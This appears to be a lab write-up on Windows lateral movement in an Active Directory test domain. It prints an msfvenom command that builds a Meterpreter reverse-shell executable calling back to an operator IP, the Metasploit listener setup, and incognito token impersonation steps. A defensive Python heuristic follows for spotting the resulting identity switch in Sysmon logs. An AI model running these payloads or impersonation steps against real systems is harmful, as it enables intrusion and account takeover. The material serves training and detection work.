
The lab consists of an Active Directory environment configured with the following parameters.
The following user accounts have been added to the domain structure:

Since Pass-the-Hash is a lateral movement technique, it presupposes an existing shell with administrative or SYSTEM privileges on one of the network endpoints.
I will establish an interactive Meterpreter session. To do so, I generate a malicious executable with msfvenom, which the user manuel will subsequently execute.
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=172.25.100.35 LPORT=4444 -f exe -o virus.exe


We initialize the Metasploit multi-handler payload listener:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_tcp
set LHOST 172.25.100.35
run

NOTE
Since we already hold valid credentials, executing a binary payload is not strictly necessary; we could move laterally using RDP or tools from the Impacket suite. However, because Meterpreter ships the Mimikatz suite natively through the kiwi extension, I opted for this approach for convenience.
Note that this session runs with Windows SYSTEM privileges, accurately replicating a scenario in which an initial endpoint has been fully compromised and the threat actor aims to pivot across the infrastructure.
This is a token impersonation attack: an operator steals the access token of a domain user who is logged on to the initially compromised endpoint and uses it to extend their access to other resources.
We load the native incognito extension in Metasploit:
load incognito
We list the tokens present on the system to find the target account:

We impersonate the token to switch our execution context to that identity without supplying a password:
impersonate_token AROCHE\\manuel

We can now spawn a shell running directly under the security context of manuel.
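From the defender's side, the step just described leaves a distinctive trace on the endpoint: the implant keeps running as SYSTEM while the shell it spawns runs as the impersonated domain user. The following Python script is an added example, not part of the original write-up or of Metasploit; it applies that heuristic to constructed Sysmon-style process-creation records (Event ID 1 field names; the `|`-separated layout, the sample records and the benign-parent allow-list are assumptions for this example).

```python
"""Heuristic detection of token impersonation from Sysmon process-creation events.

Added example, not part of the original write-up. After impersonate_token the
shell spawned by the implant runs as the domain user while the implant itself
still runs as SYSTEM, so a Sysmon Event ID 1 record shows ParentUser = SYSTEM
and User = a domain account. Field names follow the Sysmon schema; the '|'
separated key=value layout and the sample records below are constructed.
"""
SERVICE_ACCOUNTS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
}
# Windows components that legitimately start user processes from a SYSTEM
# parent. Assumption: a starting allow-list, to be tuned per environment.
BENIGN_SYSTEM_PARENTS = {
    r"c:\windows\system32\winlogon.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
}
# Constructed sample telemetry: one record per line, values never contain '|'.
SAMPLE_EVENTS = """\
EventID=1|UtcTime=2024-03-01 10:02:11|Image=C:\\Windows\\System32\\cmd.exe|User=AROCHE\\manuel|ParentImage=C:\\Users\\manuel\\Downloads\\virus.exe|ParentUser=NT AUTHORITY\\SYSTEM
EventID=1|UtcTime=2024-03-01 10:02:30|Image=C:\\Windows\\System32\\userinit.exe|User=AROCHE\\manuel|ParentImage=C:\\Windows\\System32\\winlogon.exe|ParentUser=NT AUTHORITY\\SYSTEM
EventID=1|UtcTime=2024-03-01 10:03:40|Image=C:\\Windows\\System32\\notepad.exe|User=AROCHE\\manuel|ParentImage=C:\\Windows\\explorer.exe|ParentUser=AROCHE\\manuel
EventID=1|UtcTime=2024-03-01 10:04:02|Image=C:\\Windows\\System32\\svchost.exe|User=NT AUTHORITY\\SYSTEM|ParentImage=C:\\Windows\\System32\\services.exe|ParentUser=NT AUTHORITY\\SYSTEM
"""

def parse_record(line):
    """Split a 'k=v|k=v' record into a dict; an empty line yields {}."""
    return dict(field.split("=", 1) for field in line.split("|") if "=" in field)

def is_token_swap(rec):
    """True when a service-account parent that is not a known logon/service
    binary spawned a child running as a domain user (identity changed between
    parent and child without a logon by the parent)."""
    if rec.get("EventID") != "1":
        return False
    parent_user = rec.get("ParentUser", "").upper()
    child_user = rec.get("User", "").upper()
    if parent_user not in SERVICE_ACCOUNTS or child_user in SERVICE_ACCOUNTS:
        return False
    if "\\" not in child_user or child_user.startswith("NT AUTHORITY\\"):
        return False  # built-in or local principal, not a domain account
    return rec.get("ParentImage", "").lower() not in BENIGN_SYSTEM_PARENTS

def scan(lines):
    """Return the matching records in log order."""
    return [rec for rec in map(parse_record, lines) if rec and is_token_swap(rec)]
```

On the sample data only the cmd.exe spawned by the SYSTEM-level implant is reported; the winlogon-to-userinit record is suppressed by the allow-list and the remaining records show no identity change.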
